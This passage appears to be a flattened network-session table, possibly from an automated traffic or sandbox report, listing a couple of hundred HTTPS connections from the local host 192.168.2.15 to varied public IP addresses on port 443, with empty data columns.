                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16519192.168.2.154398435.34.135.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16520192.168.2.1541062107.202.223.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16521192.168.2.1560726131.69.17.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16522192.168.2.154539696.176.126.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16523192.168.2.1558838177.249.111.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16524192.168.2.155538081.4.147.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16525192.168.2.1548762222.99.115.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16526192.168.2.1548176182.179.210.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16527192.168.2.15563844.103.63.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16528192.168.2.153926645.255.87.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16529192.168.2.153735013.185.181.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16530192.168.2.1547586117.1.70.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16531192.168.2.1545536189.122.106.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16532192.168.2.1533410143.218.158.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16533192.168.2.155215031.195.195.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16534192.168.2.155043834.34.186.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16535192.168.2.1542246119.230.26.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16536192.168.2.1546456192.215.187.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16537192.168.2.1558000124.51.206.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16538192.168.2.155693675.155.137.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16539192.168.2.1537034166.93.215.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16540192.168.2.1545208129.170.108.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16541192.168.2.154608274.228.47.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16542192.168.2.1536660162.178.168.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16543192.168.2.155220266.135.185.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16544192.168.2.1547246166.238.182.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16545192.168.2.1539544152.10.221.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16546192.168.2.1533894135.228.161.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16547192.168.2.1554236115.243.171.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16548192.168.2.1538758136.120.17.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16549192.168.2.153836098.45.160.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16550192.168.2.155582845.177.106.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16551192.168.2.1534716121.221.63.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16552192.168.2.1559036178.176.17.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16553192.168.2.155559619.229.90.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16554192.168.2.153509232.138.44.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16555192.168.2.1540688133.212.4.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16556192.168.2.1557314108.213.96.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16557192.168.2.155909647.255.44.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16558192.168.2.155233243.107.216.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16559192.168.2.154034072.116.27.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16560192.168.2.155332276.230.114.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16561192.168.2.1533048126.214.78.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16562192.168.2.1541184192.214.119.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16563192.168.2.1556304160.181.65.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16564192.168.2.154164217.161.190.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16565192.168.2.154142097.88.241.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16566192.168.2.1536236151.243.230.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16567192.168.2.1537602140.220.93.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16568192.168.2.1560664105.76.48.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16569192.168.2.153611051.184.71.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16570192.168.2.153445240.147.254.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16571192.168.2.1559484133.102.203.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16572192.168.2.155975884.195.120.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16573192.168.2.153479863.101.42.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16574192.168.2.1553070131.31.45.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16575192.168.2.1538816123.112.129.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16576192.168.2.154415614.93.42.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16577192.168.2.1534434123.18.129.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16578192.168.2.155928227.96.230.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16579192.168.2.154996693.119.28.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16580192.168.2.154546627.47.138.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16581192.168.2.1545442201.168.165.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16582192.168.2.1555046223.39.101.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16583192.168.2.1556942222.91.137.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16584192.168.2.153739275.235.142.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16585192.168.2.153445427.75.4.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16586192.168.2.156023035.48.237.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16587192.168.2.1556158121.88.122.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16588192.168.2.1538034155.211.55.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16589192.168.2.1545936218.49.240.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16590192.168.2.1549762126.129.196.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16591192.168.2.1541132179.84.239.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16592192.168.2.1539736159.63.213.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16593192.168.2.1552862140.151.67.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16594192.168.2.154071062.195.185.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16595192.168.2.154257223.103.148.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16596192.168.2.153511824.238.233.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16597192.168.2.155977647.165.138.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16598192.168.2.1536724181.102.229.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16599192.168.2.1546242153.203.188.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16600192.168.2.1558082192.193.196.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16601192.168.2.15348041.34.255.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16602192.168.2.1535672212.165.126.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16603192.168.2.1548074201.239.189.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16604192.168.2.155885453.108.116.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16605192.168.2.1540558192.169.18.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16606192.168.2.155679898.11.101.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16607192.168.2.154545467.125.60.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16608192.168.2.1552820112.35.32.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16609192.168.2.1559576124.223.169.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16610192.168.2.1558228176.56.103.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16611192.168.2.1544450151.2.196.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16612192.168.2.156013012.173.116.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16613192.168.2.15514761.119.89.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16614192.168.2.1560876200.67.132.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16615192.168.2.155627288.238.185.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16616192.168.2.1557146195.127.75.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16617192.168.2.1559900143.14.85.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16618192.168.2.154965277.103.95.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16619192.168.2.155962453.190.68.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16620192.168.2.1537912108.138.215.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16621192.168.2.1553568146.215.16.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16622192.168.2.153844866.233.131.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16623192.168.2.1533870113.47.74.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16624192.168.2.1541558218.236.86.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16625192.168.2.1554798170.244.179.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16626192.168.2.1543134136.200.147.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16627192.168.2.1558652123.202.92.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16628192.168.2.1555460111.1.198.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16629192.168.2.1550802211.202.170.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16630192.168.2.1539718179.115.104.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16631192.168.2.1560432219.112.181.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16632192.168.2.1545122163.245.197.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16633192.168.2.1557546147.40.192.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16634192.168.2.1558484205.106.152.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16635192.168.2.1538124124.118.236.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16636192.168.2.1556480133.217.220.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16637192.168.2.1553226114.146.120.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16638192.168.2.1547328108.162.183.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16639192.168.2.155041471.232.52.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16640192.168.2.1552406192.161.98.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16641192.168.2.155458072.154.72.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16642192.168.2.154497680.124.168.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16643192.168.2.155325648.180.105.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16644192.168.2.154226489.115.120.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16645192.168.2.1545680108.100.56.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16646192.168.2.153871219.183.56.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16647192.168.2.1552846205.143.119.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16648192.168.2.1534892142.183.81.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16649192.168.2.154212263.9.5.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16650192.168.2.1541942114.22.51.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16651192.168.2.1546378123.119.11.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16652192.168.2.153945694.102.67.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16653192.168.2.155796660.134.117.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16654192.168.2.1559818154.90.31.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16655192.168.2.154254479.185.8.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16656192.168.2.153517486.249.132.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16657192.168.2.154334092.81.160.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16658192.168.2.1556088182.58.95.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16659192.168.2.155044672.39.195.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16660192.168.2.154405488.202.224.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16661192.168.2.1546862168.188.141.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16662192.168.2.155776869.25.41.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16663192.168.2.1549366149.94.13.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16664192.168.2.1560422117.75.115.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16665192.168.2.1556074124.83.212.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16666192.168.2.1556422192.201.6.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16667192.168.2.1553048148.37.72.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16668192.168.2.153981092.163.133.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16669192.168.2.1538998144.203.200.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16670192.168.2.1560978125.17.74.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16671192.168.2.1555370148.222.72.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16672192.168.2.1541572201.86.241.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16673192.168.2.154486699.113.54.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16674192.168.2.1557726123.215.241.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16675192.168.2.1539050142.24.116.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16676192.168.2.1559080143.40.189.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16677192.168.2.1552538191.113.78.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16678192.168.2.1548092220.85.86.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16679192.168.2.1537938140.22.38.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16680192.168.2.155429063.151.207.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16681192.168.2.1537308179.191.18.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16682192.168.2.154774019.166.117.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16683192.168.2.153525294.253.137.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16684192.168.2.1547518196.163.253.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16685192.168.2.1554678213.65.125.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16686192.168.2.153444671.236.89.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16687192.168.2.1545058146.217.223.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16688192.168.2.1558694134.100.71.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16689192.168.2.1541316138.42.82.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16690192.168.2.155849269.217.69.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16691192.168.2.1554084138.80.118.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16692192.168.2.155143479.218.69.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16693192.168.2.1556382124.207.175.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16694192.168.2.154081027.64.53.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16695192.168.2.156078632.208.18.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16696192.168.2.1557654203.3.107.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16697192.168.2.1555836200.17.148.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16698192.168.2.1557064154.96.248.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16699192.168.2.156010296.84.146.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16700192.168.2.155323827.0.86.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16701192.168.2.1538298175.128.2.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16702192.168.2.1537564158.41.219.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16703192.168.2.1539226180.39.205.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16704192.168.2.1539190220.90.229.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16705192.168.2.1551576170.71.23.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16706192.168.2.1554228182.13.132.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16707192.168.2.154098245.164.33.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16708192.168.2.154149258.17.192.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16709192.168.2.154119091.167.82.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16710192.168.2.1548184175.60.87.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16711192.168.2.155981042.164.211.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16712192.168.2.1539450124.250.31.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16713192.168.2.1552544137.186.144.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16714192.168.2.1549762202.133.12.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16715192.168.2.1542542118.34.72.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16716192.168.2.153290820.98.187.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16717192.168.2.154819824.153.32.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16718192.168.2.15477265.241.97.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16719192.168.2.153614273.172.35.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16720192.168.2.153911618.125.155.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16721192.168.2.1543470152.72.130.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16722192.168.2.154804246.133.33.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16723192.168.2.1533136157.35.23.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16724192.168.2.1538622142.181.11.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16725192.168.2.1552196106.131.109.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16726192.168.2.1543402131.132.43.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16727192.168.2.1545962100.179.229.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16728192.168.2.1557536101.181.190.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16729192.168.2.1556340153.251.23.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16730192.168.2.153739218.116.178.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16731192.168.2.1541298196.188.129.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16732192.168.2.153752064.164.168.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16733192.168.2.154115482.110.237.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16734192.168.2.155992460.80.38.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16735192.168.2.1543298142.78.171.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16736192.168.2.1542278156.16.176.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16737192.168.2.153562077.92.189.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16738192.168.2.1533234164.140.195.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16739192.168.2.154874875.60.206.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
